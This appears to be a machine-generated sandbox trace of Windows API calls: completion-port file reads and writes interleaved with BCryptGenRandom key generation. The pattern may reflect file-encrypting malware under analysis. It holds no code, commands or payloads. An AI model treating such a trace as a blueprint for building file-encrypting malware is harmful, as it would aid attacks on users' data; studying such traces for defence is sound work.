1 [0113.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.904] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7620, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.940] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3772, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.016] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb6e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.018] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.021] CloseHandle (hObject=0x340) returned 1 [0114.024] free (_Block=0x3db04c0) [0114.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.060] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.060] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.060] free (_Block=0x77d7a8) [0114.060] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.060] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.060] free (_Block=0x2071c20) [0114.060] free (_Block=0x2071d30) [0114.060] free (_Block=0x77d8b0) [0114.060] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.070] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.070] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.070] free (_Block=0x77d7a8) [0114.070] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.070] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.071] free (_Block=0x2071c20) [0114.071] free (_Block=0x2071d30) [0114.071] free (_Block=0x77d8b0) [0114.071] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.075] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.075] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.075] free (_Block=0x77d7a8) [0114.075] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.075] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.075] free (_Block=0x2071c20) [0114.075] free (_Block=0x2071d30) [0114.075] free (_Block=0x77d8b0) [0114.075] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.143] CloseHandle (hObject=0x340) returned 1 [0114.147] free (_Block=0x1ff1e60) [0114.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.159] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x12bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0114.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.215] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.230] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.230] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.230] free (_Block=0x77d7a8) [0114.230] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.230] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.230] free (_Block=0x2071c20) [0114.231] free (_Block=0x2071d30) [0114.231] free (_Block=0x77d8b0) [0114.231] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.293] WriteFile (in: hFile=0x3bc, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.405] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x43fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.421] CloseHandle (hObject=0x13c0) returned 1 [0114.424] free (_Block=0x3d70450) [0114.424] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.434] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.449] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x148c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.463] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0114.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.484] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.493] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.521] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.521] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.521] free (_Block=0x77d7a8) [0114.521] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.521] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.521] free (_Block=0x2071c20) [0114.521] free (_Block=0x2071d30) [0114.521] free (_Block=0x77d8b0) [0114.522] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.522] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0114.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0114.543] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.543] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.543] free (_Block=0x77d7a8) [0114.543] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.543] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.543] free (_Block=0x2071c20) [0114.543] free (_Block=0x2071d30) [0114.543] free (_Block=0x77d8b0) [0114.543] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.558] CloseHandle (hObject=0x2f4) returned 1 [0114.564] free (_Block=0x3db04c0) [0114.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.573] CloseHandle (hObject=0x13c0) returned 1 [0114.576] free (_Block=0x3d70450) [0114.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0114.584] CloseHandle (hObject=0x3bc) returned 1 [0115.617] free (_Block=0x1ff1e60) [0115.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0115.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0115.687] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.687] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.687] free (_Block=0x77d7a8) [0115.687] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.687] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.688] free (_Block=0x2071c20) [0115.688] free (_Block=0x2071d30) [0115.688] free (_Block=0x77d8b0) [0115.688] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0115.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0115.696] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.696] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.696] free (_Block=0x77d7a8) [0115.696] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.696] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.697] free (_Block=0x2071c20) [0115.697] free (_Block=0x2071d30) [0115.697] free (_Block=0x77d8b0) [0115.697] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.701] CloseHandle (hObject=0x340) returned 1 [0115.702] free (_Block=0x3e70008) [0115.702] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0115.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0115.712] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.712] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.712] free (_Block=0x77d7a8) [0115.712] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.712] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.713] free (_Block=0x2071c20) [0115.713] free (_Block=0x2071d30) [0115.713] free (_Block=0x77d8b0) [0115.713] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.713] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.724] CloseHandle (hObject=0x3bc) returned 1 [0115.725] free (_Block=0x1ff1e60) [0115.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.737] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x488, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0115.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.763] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0115.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0115.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.773] 